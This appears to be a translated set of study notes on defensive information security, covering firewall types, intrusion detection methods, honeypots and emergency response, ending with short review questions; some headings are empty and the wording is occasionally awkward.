Information security technology - (7) Security protection and emergency response technology

1. Basic types and principles of firewalls

1.1 Firewall technology

Firewall technology is a network security device or a system composed of multiple hardware devices and corresponding software. It is located between an untrusted network and a protected internal network. The purpose is to protect the internal network from attacks from external networks and enforce regulations. access control policy

1.2 Characteristics of firewalls

• All communications from the internal network to the external network and from the external network to the internal network pass through it.
• Only communications that meet internal access control policies are allowed through
• The system itself has high computing and communication processing capabilities

1.3 Functions of firewall

1.3.1 Filtering unsecured services and communications

• Disable external pings
• Information services provided illegally on internal networks are prohibited
• Prevent information leakage

1.3.2 Prohibit unauthorized users from accessing the internal network

• Do not allow communications from special addresses
• Authenticate external connections

1.3.3 Control access to the intranet

• Only external access to the www, FTP and mail servers within the linked network is allowed and no access to other hosts is allowed.
• Record related access events

1.4 Basic contents of firewall

1.4.1 Packet filtering firewall

1. It is defined
   that the communication under each protocol is controlled by checking the protocol type, and the communication from a specific source address or sent to a specific destination address is controlled by the P address. Since the services and ports of the TCP/IP network correspond to each other, the packet filtering firewall can check the port Control access to external services and the opening of internal services. The operator of a packet filtering firewall is responsible for formulating these rules and configuring them into the firewall system.
   
2. Advantages and Disadvantages
   

1.4.2 Proxy gateway

1. Definition
- It is generally believed that connection requests from external networks are unreliable. A proxy gateway is a gateway device or system that executes a connection proxy program. The purpose of setting it up is to protect the internal network. It determines whether to send external requests according to certain security policies. The network's access request to the internal network is submitted to the corresponding internal server. If it can be submitted, the agent will connect to the internal server on behalf of the external user, and also connect to the external user on behalf of the internal server.
2. Loop agent layer
Loop layer agent is also called circuit level agent and is built on the transport layer.

3. Application proxy layer
Application layer proxy is specifically designed for different applications or services.

1.4.3 Packet inspection firewall

Based on the packet filtering firewall, the inspection object is not limited to the header of the IP packet, but may also inspect the TCP header or the data of the TCP packet. Therefore, more and more flexible security policies can be implemented at a certain computational cost.

1.4.4 Hybrid firewall

Integrates a variety of firewall technologies, including:

• IP packet filtering firewalls can be used for underlying control communications;
• Packet inspection firewalls can be used to increase enforceable security policies;
• The loop layer proxy is used to ensure security when establishing connections;
• Application layer proxies are used to ensure application security.

2. Intrusion detection technology

2.1 Definition

Intrusion detection is a type of security technology used to detect behaviors that compromise or attempt to compromise the confidentiality, integrity, or availability of a system. This type of technology monitors the status and activities of the protected network or system by deploying detection equipment in the protected network or system. Based on the collected data, it uses corresponding detection methods to discover unauthorized or malicious system and network behaviors, and provides Provide support means to prevent intrusions.

2.2 Three ways

• Collect data in networks and systems and extract features that describe network and system behavior
• Efficiently and accurately determine the behavioral nature of networks and systems based on data and characteristics
• Provides response to network and system intrusions

2.3 Intrusion detection (IDS) system structure

2.4 Types of Intrusion Detection (IDS)

• Host-based IDS:
  runs on the detected host or a separate host, and finds suspicious signs based on the host's audit data and system logs.
• Network-based IDS:
  Detect intrusions based on network traffic, audit data and logs of single or multiple hosts.

2.5 Methods of analysis and detection

2.5.1 Misuse detection

Establish behavioral patterns of various types of intrusions, identify or code them, establish a misuse pattern library, analyze and detect data from data sources, and check whether there are known misuse patterns. Disadvantages: Only known attacks can be detected
.

2.5.2 Anomaly detection

Determine the degree of deviation of system behavior or user behavior from normal usage description (NUP), and respond to behaviors that exceed thresholds or change ranges

2.5.3 Other tests

• biological immune system
• Adaptive detection system

2.6 Intrusion response

2.6.1 Passive response

Passive response : Alarm after detecting an attack, providing information to managers or users, who decide what measures to take

2.6.2 Active response

Active response : Block the attack process according to the configured policy, or otherwise influence or restrict the attack process or the recurrence of the attack.

3. Principle of “honeypot” technology

3.1 Definition

Honeypot technology refers to a type of technology that collects information about attacks and attackers. By inducing attackers to invade honeypots, the system collects and analyzes relevant information.

3.2 Classification

• applied research
• low interaction high interaction
• real virtual

3.3 Steps

Disguise and Introduce >> Information Control >> Data Capture and Analysis

4. General steps for emergency response

4.1 Response emergency technology

Network and information system facilities may be damaged due to various factors, so corresponding preventive and response measures need to be taken before and after such damage occurs. These are collectively called emergency responses.

• Early response : pre-diversion before the system is attacked
• Mid-term response : When the system is being attacked, processing methods include honeypot technology and stopping the system operation, etc.
• Later response : After the system is attacked, restore the system

4.2 Construction of emergency response system

5. Short answer questions

1. What is a firewall? What is the function?
2. What are the basic types of firewalls?
3. What is intrusion detection technology?
4. What is honeypot technology?
5. What is emergency response technology?